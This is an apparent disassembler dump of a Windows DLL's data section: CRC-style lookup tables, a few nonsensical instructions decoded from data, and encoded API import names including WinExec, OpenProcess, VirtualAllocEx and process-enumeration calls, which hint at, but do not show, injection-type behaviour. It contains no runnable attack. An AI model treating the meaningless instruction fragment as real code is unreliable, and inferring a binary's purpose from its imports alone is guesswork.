dd 0EEE4200Fh, 0ECA29E56h, 0ED60F461h, 0E82FE2E4h, 0E9ED88D3h
dd 0EBAB368Ah, 0EA695CBDh, 0FD13B8F0h, 0FCD1D2C7h, 0FE976C9Eh
dd 0FF5506A9h, 0FA1A102Ch, 0FBD87A1Bh, 0F99EC442h, 0F85CAE75h
dd 0F300E948h, 0F2C2837Fh, 0F0843D26h, 0F1465711h, 0F4094194h
dd 0F5CB2BA3h, 0F78D95FAh, 0F64FFFCDh, 0D9785D60h, 0D8BA3757h
dd 0DAFC890Eh, 0DB3EE339h, 0DE71F5BCh, 0DFB39F8Bh, 0DDF521D2h
dd 0DC374BE5h, 0D76B0CD8h, 0D6A966EFh, 0D4EFD8B6h, 0D52DB281h
dd 0D062A404h, 0D1A0CE33h, 0D3E6706Ah, 0D2241A5Dh, 0C55EFE10h
dd 0C49C9427h, 0C6DA2A7Eh, 0C7184049h, 0C25756CCh, 0C3953CFBh
dd 0C1D382A2h, 0C011E895h, 0CB4DAFA8h, 0CA8FC59Fh, 0C8C97BC6h
dd 0C90B11F1h, 0CC440774h, 0CD866D43h, 0CFC0D31Ah, 0CE02B92Dh
dd 91AF9640h, 906DFC77h, 922B422Eh, 93E92819h, 96A63E9Ch
dd 976454ABh, 9522EAF2h, 94E080C5h, 9FBCC7F8h, 9E7EADCFh
dd 9C381396h, 9DFA79A1h, 98B56F24h, 99770513h, 9B31BB4Ah
dd 9AF3D17Dh, 8D893530h, 8C4B5F07h, 8E0DE15Eh, 8FCF8B69h
dd 8A809DECh, 8B42F7DBh, 89044982h, 88C623B5h, 839A6488h
dd 82580EBFh, 801EB0E6h, 81DCDAD1h, 8493CC54h, 8551A663h
dd 8717183Ah, 86D5720Dh, 0A9E2D0A0h, 0A820BA97h, 0AA6604CEh
dd 0ABA46EF9h, 0AEEB787Ch, 0AF29124Bh, 0AD6FAC12h, 0ACADC625h
dd 0A7F18118h, 0A633EB2Fh, 0A4755576h, 0A5B73F41h, 0A0F829C4h
dd 0A13A43F3h, 0A37CFDAAh, 0A2BE979Dh, 0B5C473D0h, 0B40619E7h
dd 0B640A7BEh, 0B782CD89h, 0B2CDDB0Ch, 0B30FB13Bh, 0B1490F62h
dd 0B08B6555h, 0BBD72268h, 0BA15485Fh, 0B853F606h, 0B9919C31h
dd 0BCDE8AB4h, 0BD1CE083h, 0BF5A5EDAh, 0BE9834EDh
dword_9B6458 dd 0 ; sub_9AD21E+A5�r ...
dd 0B8BC6765h, 0AA09C88Bh, 12B5AFEEh, 8F629757h, 37DEF032h
dd 256B5FDCh, 9DD738B9h, 0C5B428EFh, 7D084F8Ah, 6FBDE064h
dd 0D7018701h, 4AD6BFB8h, 0F26AD8DDh, 0E0DF7733h, 58631056h
dd 5019579Fh, 0E8A530FAh, 0FA109F14h, 42ACF871h, 0DF7BC0C8h
dd 67C7A7ADh, 75720843h, 0CDCE6F26h, 95AD7F70h, 2D111815h
dd 3FA4B7FBh, 8718D09Eh, 1ACFE827h, 0A2738F42h, 0B0C620ACh
dd 87A47C9h, 0A032AF3Eh, 188EC85Bh, 0A3B67B5h, 0B28700D0h
dd 2F503869h, 97EC5F0Ch, 8559F0E2h, 3DE59787h, 658687D1h
dd 0DD3AE0B4h, 0CF8F4F5Ah, 7733283Fh, 0EAE41086h, 525877E3h
dd 40EDD80Dh, 0F851BF68h, 0F02BF8A1h, 48979FC4h, 5A22302Ah
dd 0E29E574Fh, 7F496FF6h, 0C7F50893h, 0D540A77Dh, 6DFCC018h
dd 359FD04Eh, 8D23B72Bh, 9F9618C5h, 272A7FA0h, 0BAFD4719h
dd 241207Ch, 10F48F92h, 0A848E8F7h, 9B14583Dh, 23A83F58h
dd 311D90B6h, 89A1F7D3h, 1476CF6Ah, 0ACCAA80Fh, 0BE7F07E1h
dd 6C36084h, 5EA070D2h, 0E61C17B7h, 0F4A9B859h, 4C15DF3Ch
dd 0D1C2E785h, 697E80E0h, 7BCB2F0Eh, 0C377486Bh, 0CB0D0FA2h
dd 73B168C7h, 6104C729h, 0D9B8A04Ch, 446F98F5h, 0FCD3FF90h
dd 0EE66507Eh, 56DA371Bh, 0EB9274Dh, 0B6054028h, 0A4B0EFC6h
dd 1C0C88A3h, 81DBB01Ah, 3967D77Fh, 2BD27891h, 936E1FF4h
dd 3B26F703h, 839A9066h, 912F3F88h, 299358EDh, 0B4446054h
dd 0CF80731h, 1E4DA8DFh, 0A6F1CFBAh, 0FE92DFECh, 462EB889h
dd 549B1767h, 0EC277002h, 71F048BBh, 0C94C2FDEh, 0DBF98030h
dd 6345E755h, 6B3FA09Ch, 0D383C7F9h, 0C1366817h, 798A0F72h
dd 0E45D37CBh, 5CE150AEh, 4E54FF40h, 0F6E89825h, 0AE8B8873h
dd 1637EF16h, 48240F8h, 0BC3E279Dh, 21E91F24h, 99557841h
dd 8BE0D7AFh, 335CB0CAh, 0ED59B63Bh, 55E5D15Eh, 47507EB0h
dd 0FFEC19D5h, 623B216Ch, 0DA874609h, 0C832E9E7h, 708E8E82h
dd 28ED9ED4h, 9051F9B1h, 82E4565Fh, 3A58313Ah, 0A78F0983h
dd 1F336EE6h, 0D86C108h, 0B53AA66Dh, 0BD40E1A4h, 5FC86C1h
dd 1749292Fh, 0AFF54E4Ah, 322276F3h, 8A9E1196h, 982BBE78h
dd 2097D91Dh, 78F4C94Bh, 0C048AE2Eh, 0D2FD01C0h, 6A4166A5h
dd 0F7965E1Ch, 4F2A3979h, 5D9F9697h, 0E523F1F2h, 4D6B1905h
dd 0F5D77E60h, 0E762D18Eh, 5FDEB6EBh, 0C2098E52h, 7AB5E937h
dd 680046D9h, 0D0BC21BCh, 88DF31EAh, 3063568Fh, 22D6F961h
dd 9A6A9E04h, 7BDA6BDh, 0BF01C1D8h, 0ADB46E36h, 15080953h
dd 1D724E9Ah, 0A5CE29FFh, 0B77B8611h, 0FC7E174h, 9210D9CDh
dd 2AACBEA8h, 38191146h, 80A57623h, 0D8C66675h, 607A0110h
dd 72CFAEFEh, 0CA73C99Bh, 57A4F122h, 0EF189647h, 0FDAD39A9h
dd 45115ECCh, 764DEE06h, 0CEF18963h, 0DC44268Dh, 64F841E8h
dd 0F92F7951h, 41931E34h, 5326B1DAh, 0EB9AD6BFh, 0B3F9C6E9h
dd 0B45A18Ch, 19F00E62h, 0A14C6907h, 3C9B51BEh, 842736DBh
dd 96929935h, 2E2EFE50h, 2654B999h, 9EE8DEFCh, 8C5D7112h
dd 34E11677h, 0A9362ECEh, 118A49ABh, 33FE645h, 0BB838120h
dd 0E3E09176h, 5B5CF613h, 49E959FDh, 0F1553E98h, 6C820621h
dd 0D43E6144h, 0C68BCEAAh, 7E37A9CFh, 0D67F4138h, 6EC3265Dh
dd 7C7689B3h, 0C4CAEED6h, 591DD66Fh, 0E1A1B10Ah, 0F3141EE4h
dd 4BA87981h, 13CB69D7h, 0AB770EB2h, 0B9C2A15Ch, 17EC639h
dd 9CA9FE80h, 241599E5h, 36A0360Bh, 8E1C516Eh, 866616A7h
dd 3EDA71C2h, 2C6FDE2Ch, 94D3B949h, 90481F0h, 0B1B8E695h
dd 0A30D497Bh, 1BB12E1Eh, 43D23E48h, 0FB6E592Dh, 0E9DBF6C3h
dd 516791A6h, 0CCB0A91Fh, 740CCE7Ah, 66B96194h, 0DE0506F1h
dword_9B6858 dd 0 dd 96300777h, 2C610EEEh, 0BA510999h, 19C46D07h, 8FF46A70h
dd 35A563E9h, 0A395649Eh, 3288DB0Eh, 0A4B8DC79h, 1EE9D5E0h
dd 88D9D297h, 2B4CB609h, 0BD7CB17Eh, 72DB8E7h, 911DBF90h
dd 6410B71Dh, 0F220B06Ah, 4871B9F3h, 0DE41BE84h, 7DD4DA1Ah
dd 0EBE4DD6Dh, 51B5D4F4h, 0C785D383h, 56986C13h, 0C0A86B64h
dd 7AF962FDh, 0ECC9658Ah, 4F5C0114h, 0D96C0663h, 633D0FFAh
dd 0F50D088Dh, 0C8206E3Bh, 5E10694Ch, 0E44160D5h, 727167A2h
dd 0D1E4033Ch, 47D4044Bh, 0FD850DD2h, 6BB50AA5h, 0FAA8B535h
dd 6C98B242h, 0D6C9BBDBh, 40F9BCACh, 0E36CD832h, 755CDF45h
dd 0CF0DD6DCh, 593DD1ABh, 0AC30D926h, 3A00DE51h, 8051D7C8h
dd 1661D0BFh, 0B5F4B421h, 23C4B356h, 9995BACFh, 0FA5BDB8h
dd 9EB80228h, 888055Fh, 0B2D90CC6h, 24E90BB1h, 877C6F2Fh
dd 114C6858h, 0AB1D61C1h, 3D2D66B6h, 9041DC76h, 671DB01h
dd 0BC20D298h, 2A10D5EFh, 8985B171h, 1FB5B606h, 0A5E4BF9Fh
dd 33D4B8E8h, 0A2C90778h, 34F9000Fh, 8EA80996h, 18980EE1h
dd 0BB0D6A7Fh, 2D3D6D08h, 976C6491h, 15C63E6h, 0F4516B6Bh
dd 62616C1Ch, 0D8306585h, 4E0062F2h, 0ED95066Ch, 7BA5011Bh
dd 0C1F40882h, 57C40FF5h, 0C6D9B065h, 50E9B712h, 0EAB8BE8Bh
dd 7C88B9FCh, 0DF1DDD62h, 492DDA15h, 0F37CD38Ch, 654CD4FBh
dd 5861B24Dh, 0CE51B53Ah, 7400BCA3h, 0E230BBD4h, 41A5DF4Ah
dd 0D795D83Dh, 6DC4D1A4h, 0FBF4D6D3h, 6AE96943h, 0FCD96E34h
dd 468867ADh, 0D0B860DAh, 732D0444h, 0E51D0333h, 5F4C0AAAh
dd 0C97C0DDDh, 3C710550h, 0AA410227h, 10100BBEh, 86200CC9h
dd 25B56857h, 0B3856F20h, 9D466B9h, 9FE461CEh, 0EF9DE5Eh
dd 98C9D929h, 2298D0B0h, 0B4A8D7C7h, 173DB359h, 810DB42Eh
dd 3B5CBDB7h, 0AD6CBAC0h, 2083B8EDh, 0B6B3BF9Ah, 0CE2B603h
dd 9AD2B174h, 3947D5EAh, 0AF77D29Dh, 1526DB04h, 8316DC73h
dd 120B63E3h, 843B6494h, 3E6A6D0Dh, 0A85A6A7Ah, 0BCF0EE4h
dd 9DFF0993h, 27AE000Ah, 0B19E077Dh, 44930FF0h, 0D2A30887h
dd 68F2011Eh, 0FEC20669h, 5D5762F7h, 0CB676580h, 71366C19h
dd 0E7066B6Eh, 761BD4FEh, 0E02BD389h, 5A7ADA10h, 0CC4ADD67h
dd 6FDFB9F9h, 0F9EFBE8Eh, 43BEB717h, 0D58EB060h, 0E8A3D6D6h
dd 7E93D1A1h, 0C4C2D838h, 52F2DF4Fh, 0F167BBD1h, 6757BCA6h
dd 0DD06B53Fh, 4B36B248h, 0DA2B0DD8h, 4C1B0AAFh, 0F64A0336h
dd 607A0441h, 0C3EF60DFh, 55DF67A8h, 0EF8E6E31h, 79BE6946h
dd 8CB361CBh, 1A8366BCh, 0A0D26F25h, 36E26852h, 95770CCCh
dd 3470BBBh, 0B9160222h, 2F260555h, 0BE3BBAC5h, 280BBDB2h
dd 925AB42Bh, 46AB35Ch, 0A7FFD7C2h, 31CFD0B5h, 8B9ED92Ch
dd 1DAEDE5Bh, 0B0C2649Bh, 26F263ECh, 9CA36A75h, 0A936D02h
dd 0A906099Ch, 3F360EEBh, 85670772h, 13570005h, 824ABF95h
dd 147AB8E2h, 0AE2BB17Bh, 381BB60Ch, 9B8ED292h, 0DBED5E5h
dd 0B7EFDC7Ch, 21DFDB0Bh, 0D4D2D386h, 42E2D4F1h, 0F8B3DD68h
dd 6E83DA1Fh, 0CD16BE81h, 5B26B9F6h, 0E177B06Fh, 7747B718h
dd 0E65A0888h, 706A0FFFh, 0CA3B0666h, 5C0B0111h, 0FF9E658Fh
dd 69AE62F8h, 0D3FF6B61h, 45CF6C16h, 78E20AA0h, 0EED20DD7h
dd 5483044Eh, 0C2B30339h, 612667A7h, 0F71660D0h, 4D476949h
dd 0DB776E3Eh, 4A6AD1AEh, 0DC5AD6D9h, 660BDF40h, 0F03BD837h
dd 53AEBCA9h, 0C59EBBDEh, 7FCFB247h, 0E9FFB530h, 1CF2BDBDh
dd 8AC2BACAh, 3093B353h, 0A6A3B424h, 536D0BAh, 9306D7CDh
dd 2957DE54h, 0BF67D923h, 2E7A66B3h, 0B84A61C4h, 21B685Dh
dd 942B6F2Ah, 37BE0BB4h, 0A18E0CC3h, 1BDF055Ah, 8DEF022Dh
dword_9B6C58 dd 0 dd 41311B19h, 82623632h, 0C3532D2Bh, 4C56C64h, 45F4777Dh
dd 86A75A56h, 0C796414Fh, 88AD9C8h, 49BBC2D1h, 8AE8EFFAh
dd 0CBD9F4E3h, 0C4FB5ACh, 4D7EAEB5h, 8E2D839Eh, 0CF1C9887h
dd 5112C24Ah, 1023D953h, 0D370F478h, 9241EF61h, 55D7AE2Eh
dd 14E6B537h, 0D7B5981Ch, 96848305h, 59981B82h, 18A9009Bh
dd 0DBFA2DB0h, 9ACB36A9h, 5D5D77E6h, 1C6C6CFFh, 0DF3F41D4h
dd 9E0E5ACDh, 0A2248495h, 0E3159F8Ch, 2046B2A7h, 6177A9BEh
dd 0A6E1E8F1h, 0E7D0F3E8h, 2483DEC3h, 65B2C5DAh, 0AAAE5D5Dh
dd 0EB9F4644h, 28CC6B6Fh, 69FD7076h, 0AE6B3139h, 0EF5A2A20h
dd 2C09070Bh, 6D381C12h, 0F33646DFh, 0B2075DC6h, 715470EDh
dd 30656BF4h, 0F7F32ABBh, 0B6C231A2h, 75911C89h, 34A00790h
dd 0FBBC9F17h, 0BA8D840Eh, 79DEA925h, 38EFB23Ch, 0FF79F373h
dd 0BE48E86Ah, 7D1BC541h, 3C2ADE58h, 54F79F0h, 447E62E9h
dd 872D4FC2h, 0C61C54DBh, 18A1594h, 40BB0E8Dh, 83E823A6h
dd 0C2D938BFh, 0DC5A038h, 4CF4BB21h, 8FA7960Ah, 0CE968D13h
dd 900CC5Ch, 4831D745h, 8B62FA6Eh, 0CA53E177h, 545DBBBAh
dd 156CA0A3h, 0D63F8D88h, 970E9691h, 5098D7DEh, 11A9CCC7h
dd 0D2FAE1ECh, 93CBFAF5h, 5CD76272h, 1DE6796Bh, 0DEB55440h
dd 9F844F59h, 58120E16h, 1923150Fh, 0DA703824h, 9B41233Dh
dd 0A76BFD65h, 0E65AE67Ch, 2509CB57h, 6438D04Eh, 0A3AE9101h
dd 0E29F8A18h, 21CCA733h, 60FDBC2Ah, 0AFE124ADh, 0EED03FB4h
dd 2D83129Fh, 6CB20986h, 0AB2448C9h, 0EA1553D0h, 29467EFBh
dd 687765E2h, 0F6793F2Fh, 0B7482436h, 741B091Dh, 352A1204h
dd 0F2BC534Bh, 0B38D4852h, 70DE6579h, 31EF7E60h, 0FEF3E6E7h
dd 0BFC2FDFEh, 7C91D0D5h, 3DA0CBCCh, 0FA368A83h, 0BB07919Ah
dd 7854BCB1h, 3965A7A8h, 4B98833Bh, 0AA99822h, 0C9FAB509h
dd 88CBAE10h, 4F5DEF5Fh, 0E6CF446h, 0CD3FD96Dh, 8C0EC274h
dd 43125AF3h, 22341EAh, 0C1706CC1h, 804177D8h, 47D73697h
dd 6E62D8Eh, 0C5B500A5h, 84841BBCh, 1A8A4171h, 5BBB5A68h
dd 98E87743h, 0D9D96C5Ah, 1E4F2D15h, 5F7E360Ch, 9C2D1B27h
dd 0DD1C003Eh, 120098B9h, 533183A0h, 9062AE8Bh, 0D153B592h
dd 16C5F4DDh, 57F4EFC4h, 94A7C2EFh, 0D596D9F6h, 0E9BC07AEh
dd 0A88D1CB7h, 6BDE319Ch, 2AEF2A85h, 0ED796BCAh, 0AC4870D3h
dd 6F1B5DF8h, 2E2A46E1h, 0E136DE66h, 0A007C57Fh, 6354E854h
dd 2265F34Dh, 0E5F3B202h, 0A4C2A91Bh, 67918430h, 26A09F29h
dd 0B8AEC5E4h, 0F99FDEFDh, 3ACCF3D6h, 7BFDE8CFh, 0BC6BA980h
dd 0FD5AB299h, 3E099FB2h, 7F3884ABh, 0B0241C2Ch, 0F1150735h
dd 32462A1Eh, 73773107h, 0B4E17048h, 0F5D06B51h, 3683467Ah
dd 77B25D63h, 4ED7FACBh, 0FE6E1D2h, 0CCB5CCF9h, 8D84D7E0h
dd 4A1296AFh, 0B238DB6h, 0C870A09Dh, 8941BB84h, 465D2303h
dd 76C381Ah, 0C43F1531h, 850E0E28h, 42984F67h, 3A9547Eh
dd 0C0FA7955h, 81CB624Ch, 1FC53881h, 5EF42398h, 9DA70EB3h
dd 0DC9615AAh, 1B0054E5h, 5A314FFCh, 996262D7h, 0D85379CEh
dd 174FE149h, 567EFA50h, 952DD77Bh, 0D41CCC62h, 138A8D2Dh
dd 52BB9634h, 91E8BB1Fh, 0D0D9A006h, 0ECF37E5Eh, 0ADC26547h
dd 6E91486Ch, 2FA05375h, 0E836123Ah, 0A9070923h, 6A542408h
dd 2B653F11h, 0E479A796h, 0A548BC8Fh, 661B91A4h, 272A8ABDh
dd 0E0BCCBF2h, 0A18DD0EBh, 62DEFDC0h, 23EFE6D9h, 0BDE1BC14h
dd 0FCD0A70Dh, 3F838A26h, 7EB2913Fh, 0B924D070h, 0F815CB69h
dd 3B46E642h, 7A77FD5Bh, 0B56B65DCh, 0F45A7EC5h, 370953EEh
dd 763848F7h, 0B1AE09B8h, 0F09F12A1h, 33CC3F8Ah, 72FD2493h
dd 0
; ---------------------------------------------------------------------------
add edx, eax
push 37h
add eax, [esp+edx*8-41B9FD92h]
pop ecx
pop es
or [eax-3D34F924h], ebp
jmp short loc_9B7075
; ---------------------------------------------------------------------------
lea edi, [edx+esi*4+5]
loc_9B7075: ; CODE XREF: .text:009B706F�j
dec edi
push ss
test [esi], ecx
adc edx, [ecx-48h]
psrlw mm7, qword ptr [ebx]
; ---------------------------------------------------------------------------
db 8Fh
dd 0D685970Dh, 0E1EF550Ch, 64F91A09h, 5393D808h, 0A2D9E0Ah
dd 3D475C0Bh, 70A3261Ch, 47C9E41Dh, 1E77A21Fh, 291D601Eh
dd 0AC0B2F1Bh, 9B61ED1Ah, 0C2DFAB18h, 0F5B56919h, 0C8F23512h
dd 0FF98F713h, 0A626B111h, 914C7310h, 145A3C15h, 2330FE14h
dd 7A8EB816h, 4DE47A17h, 0E0464D38h, 0D72C8F39h, 8E92C93Bh
dd 0B9F80B3Ah, 3CEE443Fh, 0B84863Eh, 523AC03Ch, 6550023Dh
dd 58175E36h, 6F7D9C37h, 36C3DA35h, 1A91834h, 84BF5731h
dd 0B3D59530h, 0EA6BD332h, 0DD011133h, 90E56B24h, 0A78FA925h
dd 0FE31EF27h, 0C95B2D26h, 4C4D6223h, 7B27A022h, 2299E620h
dd 15F32421h, 28B4782Ah, 1FDEBA2Bh, 4660FC29h, 710A3E28h
dd 0F41C712Dh, 0C376B32Ch, 9AC8F52Eh, 0ADA2372Fh, 0C08D9A70h
dd 0F7E75871h, 0AE591E73h, 9933DC72h, 1C259377h, 2B4F5176h
dd 72F11774h, 459BD575h, 78DC897Eh, 4FB64B7Fh, 16080D7Dh
dd 2162CF7Ch, 0A4748079h, 931E4278h, 0CAA0047Ah, 0FDCAC67Bh
dd 0B02EBC6Ch, 87447E6Dh, 0DEFA386Fh, 0E990FA6Eh, 6C86B56Bh
dd 5BEC776Ah, 2523168h, 3538F369h, 87FAF62h, 3F156D63h
dd 66AB2B61h, 51C1E960h, 0D4D7A665h, 0E3BD6464h, 0BA032266h
dd 8D69E067h, 20CBD748h, 17A11549h, 4E1F534Bh, 7975914Ah
dd 0FC63DE4Fh, 0CB091C4Eh, 92B75A4Ch, 0A5DD984Dh, 989AC446h
dd 0AFF00647h, 0F64E4045h, 0C1248244h, 4432CD41h, 73580F40h
dd 2AE64942h, 1D8C8B43h, 5068F154h, 67023355h, 3EBC7557h
dd 9D6B756h, 8CC0F853h, 0BBAA3A52h, 0E2147C50h, 0D57EBE51h
dd 0E839E25Ah, 0DF53205Bh, 86ED6659h, 0B187A458h, 3491EB5Dh
dd 3FB295Ch, 5A456F5Eh, 6D2FAD5Fh, 801B35E1h, 0B771F7E0h
dd 0EECFB1E2h, 0D9A573E3h, 5CB33CE6h, 6BD9FEE7h, 3267B8E5h
dd 50D7AE4h, 384A26EFh, 0F20E4EEh, 569EA2ECh, 61F460EDh
dd 0E4E22FE8h, 0D388EDE9h, 8A36ABEBh, 0BD5C69EAh, 0F0B813FDh
dd 0C7D2D1FCh, 9E6C97FEh, 0A90655FFh, 2C101AFAh, 1B7AD8FBh
dd 42C49EF9h, 75AE5CF8h, 48E900F3h, 7F83C2F2h, 263D84F0h
dd 115746F1h, 944109F4h, 0A32BCBF5h, 0FA958DF7h, 0CDFF4FF6h
dd 605D78D9h, 5737BAD8h, 0E89FCDAh, 39E33EDBh, 0BCF571DEh
dd 8B9FB3DFh, 0D221F5DDh, 0E54B37DCh, 0D80C6BD7h, 0EF66A9D6h
dd 0B6D8EFD4h, 81B22DD5h, 4A462D0h, 33CEA0D1h, 6A70E6D3h
dd 5D1A24D2h, 10FE5EC5h, 27949CC4h, 7E2ADAC6h, 494018C7h
dd 0CC5657C2h, 0FB3C95C3h, 0A282D3C1h, 95E811C0h, 0A8AF4DCBh
dd 9FC58FCAh, 0C67BC9C8h, 0F1110BC9h, 740744CCh, 436D86CDh
dd 1AD3C0CFh, 2DB902CEh, 4096AF91h, 77FC6D90h, 2E422B92h
dd 1928E993h, 9C3EA696h, 0AB546497h, 0F2EA2295h, 0C580E094h
dd 0F8C7BC9Fh, 0CFAD7E9Eh, 9613389Ch, 0A179FA9Dh, 246FB598h
dd 13057799h, 4ABB319Bh, 7DD1F39Ah, 3035898Dh, 75F4B8Ch
dd 5EE10D8Eh, 698BCF8Fh, 0EC9D808Ah, 0DBF7428Bh, 82490489h
dd 0B523C688h, 88649A83h, 0BF0E5882h, 0E6B01E80h, 0D1DADC81h
dd 54CC9384h, 63A65185h, 3A181787h, 0D72D586h, 0A0D0E2A9h
dd 97BA20A8h, 0CE0466AAh, 0F96EA4ABh, 7C78EBAEh, 4B1229AFh
dd 12AC6FADh, 25C6ADACh, 1881F1A7h, 2FEB33A6h, 765575A4h
dd 413FB7A5h, 0C429F8A0h, 0F3433AA1h, 0AAFD7CA3h, 9D97BEA2h
dd 0D073C4B5h, 0E71906B4h, 0BEA740B6h, 89CD82B7h, 0CDBCDB2h
dd 3BB10FB3h, 620F49B1h, 55658BB0h, 6822D7BBh, 5F4815BAh
dd 6F653B8h, 319C91B9h, 0B48ADEBCh, 83E01CBDh, 0DA5E5ABFh
dd 0ED3498BEh, 0
dd 6567BCB8h, 8BC809AAh, 0EEAFB512h, 5797628Fh, 32F0DE37h
dd 0DC5F6B25h, 0B938D79Dh, 0EF28B4C5h, 8A4F087Dh, 64E0BD6Fh
dd 18701D7h, 0B8BFD64Ah, 0DDD86AF2h, 3377DFE0h, 56106358h
dd 9F571950h, 0FA30A5E8h, 149F10FAh, 71F8AC42h, 0C8C07BDFh
dd 0ADA7C767h, 43087275h, 266FCECDh, 707FAD95h, 1518112Dh
dd 0FBB7A43Fh, 9ED01887h, 27E8CF1Ah, 428F73A2h, 0AC20C6B0h
dd 0C9477A08h, 3EAF32A0h, 5BC88E18h, 0B5673B0Ah, 0D00087B2h
dd 6938502Fh, 0C5FEC97h, 0E2F05985h, 8797E53Dh, 0D1878665h
dd 0B4E03ADDh, 5A4F8FCFh, 3F283377h, 8610E4EAh, 0E3775852h
dd 0DD8ED40h, 68BF51F8h, 0A1F82BF0h, 0C49F9748h, 2A30225Ah
dd 4F579EE2h, 0F66F497Fh, 9308F5C7h, 7DA740D5h, 18C0FC6Dh
dd 4ED09F35h, 2BB7238Dh, 0C518969Fh, 0A07F2A27h, 1947FDBAh
dd 7C204102h, 928FF410h, 0F7E848A8h, 3D58149Bh, 583FA823h
dd 0B6901D31h, 0D3F7A189h, 6ACF7614h, 0FA8CAACh, 0E1077FBEh
dd 8460C306h, 0D270A05Eh, 0B7171CE6h, 59B8A9F4h, 3CDF154Ch
dd 85E7C2D1h, 0E0807E69h, 0E2FCB7Bh, 6B4877C3h, 0A20F0DCBh
dd 0C768B173h, 29C70461h, 4CA0B8D9h, 0F5986F44h, 90FFD3FCh
dd 7E5066EEh, 1B37DA56h, 4D27B90Eh, 284005B6h, 0C6EFB0A4h
dd 0A3880C1Ch, 1AB0DB81h, 7FD76739h, 9178D22Bh, 0F41F6E93h
dd 3F7263Bh, 66909A83h, 883F2F91h, 0ED589329h, 546044B4h
dd 3107F80Ch, 0DFA84D1Eh, 0BACFF1A6h, 0ECDF92FEh, 89B82E46h
dd 67179B54h, 27027ECh, 0BB48F071h, 0DE2F4CC9h, 3080F9DBh
dd 55E74563h, 9CA03F6Bh, 0F9C783D3h, 176836C1h, 720F8A79h
dd 0CB375DE4h, 0AE50E15Ch, 40FF544Eh, 2598E8F6h, 73888BAEh
dd 16EF3716h, 0F8408204h, 9D273EBCh, 241FE921h, 41785599h
dd 0AFD7E08Bh, 0CAB05C33h, 3BB659EDh, 5ED1E555h, 0B07E5047h
dd 0D519ECFFh, 6C213B62h, 94687DAh, 0E7E932C8h, 828E8E70h
dd 0D49EED28h, 0B1F95190h, 5F56E482h, 3A31583Ah, 83098FA7h
dd 0E66E331Fh, 8C1860Dh, 6DA63AB5h, 0A4E140BDh, 0C186FC05h
dd 2F294917h, 4A4EF5AFh, 0F3762232h, 96119E8Ah, 78BE2B98h
dd 1DD99720h, 4BC9F478h, 2EAE48C0h, 0C001FDD2h, 0A566416Ah
dd 1C5E96F7h, 79392A4Fh, 97969F5Dh, 0F2F123E5h, 5196B4Dh
dd 607ED7F5h, 8ED162E7h, 0EBB6DE5Fh, 528E09C2h, 37E9B57Ah
dd 0D9460068h, 0BC21BCD0h, 0EA31DF88h, 8F566330h, 61F9D622h
dd 49E6A9Ah, 0BDA6BD07h, 0D8C101BFh, 366EB4ADh, 53090815h
dd 9A4E721Dh, 0FF29CEA5h, 11867BB7h, 74E1C70Fh, 0CDD91092h
dd 0A8BEAC2Ah, 46111938h, 2376A580h, 7566C6D8h, 10017A60h
dd 0FEAECF72h, 9BC973CAh, 22F1A457h, 479618EFh, 0A939ADFDh
dd 0CC5E1145h, 6EE4D76h, 6389F1CEh, 8D2644DCh, 0E841F864h
dd 51792FF9h, 341E9341h, 0DAB12653h, 0BFD69AEBh, 0E9C6F9B3h
dd 8CA1450Bh, 620EF019h, 7694CA1h, 0BE519B3Ch, 0DB362784h
dd 35999296h, 50FE2E2Eh, 99B95426h, 0FCDEE89Eh, 12715D8Ch
dd 7716E134h, 0CE2E36A9h, 0AB498A11h, 45E63F03h, 208183BBh
dd 7691E0E3h, 13F65C5Bh, 0FD59E949h, 983E55F1h, 2106826Ch
dd 44613ED4h, 0AACE8BC6h, 0CFA9377Eh, 38417FD6h, 5D26C36Eh
dd 0B389767Ch, 0D6EECAC4h, 6FD61D59h, 0AB1A1E1h, 0E41E14F3h
dd 8179A84Bh, 0D769CB13h, 0B20E77ABh, 5CA1C2B9h, 39C67E01h
dd 80FEA99Ch, 0E5991524h, 0B36A036h, 6E511C8Eh, 0A7166686h
dd 0C271DA3Eh, 2CDE6F2Ch, 49B9D394h, 0F0810409h, 95E6B8B1h
dd 7B490DA3h, 1E2EB11Bh, 483ED243h, 2D596EFBh, 0C3F6DBE9h
dd 0A6916751h, 1FA9B0CCh, 7ACE0C74h, 9461B966h, 0F10605DEh
dword_9B7858 dd 1 ; _CRT_INIT(x,x,x)+10�w ...
dword_9B785C dd 0 ; sub_9A74B7+2F�o ...
dword_9B7860 dd 0 dword_9B7864 dd 34678h ; _CRT_INIT(x,x,x)+75�r
dword_9B7868 dd 34678h ; _CRT_INIT(x,x,x)+45�r ...
dword_9B786C dd 0 ; DllEntryPoint+82�r
dd 5E4h dup(0)
dd 174h, 34h, 69725701h, 69466574h, 100656Ch, 74696157h
dd 4D726F46h, 69746C75h, 4F656C70h, 63656A62h, 1007374h
dd 6D726554h, 74616E69h, 72685465h, 646165h, 74654701h
dd 74737953h, 69546D65h, 100656Dh, 74737953h, 69546D65h
dd 6F54656Dh, 656C6946h, 656D6954h, 65470100h, 6D655474h
dd 6C694670h, 6D614E65h, 1004165h, 54746547h, 50706D65h
dd 41687461h, 69570100h, 6578456Eh, 4D010063h, 69746C75h
dd 65747942h, 69576F54h, 68436564h, 1007261h, 65657246h
dd 7262694Ch, 797261h, 65704F01h, 6576456Eh, 41746Eh, 74655301h
dd 6E657645h, 49010074h, 7265746Eh, 6B636F6Ch, 78456465h
dd 6E616863h, 1006567h, 61657243h, 76456574h, 41746E65h
dd 6E490100h, 6C726574h, 656B636Fh, 636E4964h, 656D6572h
dd 100746Eh, 65746E49h, 636F6C72h, 4464656Bh, 65726365h
dd 746E656Dh, 61570100h, 6F467469h, 6E695372h, 4F656C67h
dd 63656A62h, 44010074h, 74656C65h, 6C694665h, 1004165h
dd 64616552h, 656C6946h, 65480100h, 72467061h, 1006565h
dd 50746547h, 65636F72h, 65487373h, 1007061h, 70616548h
dd 6F6C6C41h, 47010063h, 69467465h, 6954656Ch, 100656Dh
dd 46746553h, 54656C69h, 656D69h, 74654701h, 72727543h
dd 54746E65h, 61657268h, 644964h, 74654701h, 72727543h
dd 50746E65h, 65636F72h, 64497373h, 75510100h, 50797265h
dd 6F667265h, 6E616D72h, 6F436563h, 65746E75h, 47010072h
dd 69547465h, 6F436B63h, 746E75h, 74654701h, 756C6F56h
dd 6E49656Dh, 6D726F66h, 6F697461h, 100416Eh, 61657243h
dd 6F546574h, 65686C6Fh, 3233706Ch, 70616E53h, 746F6873h
dd 72500100h, 7365636Fh, 46323373h, 74737269h, 72500100h
dd 7365636Fh, 4E323373h, 747865h, 65704F01h, 6F72506Eh
dd 73736563h, 69560100h, 61757472h, 6C6C416Ch, 7845636Fh
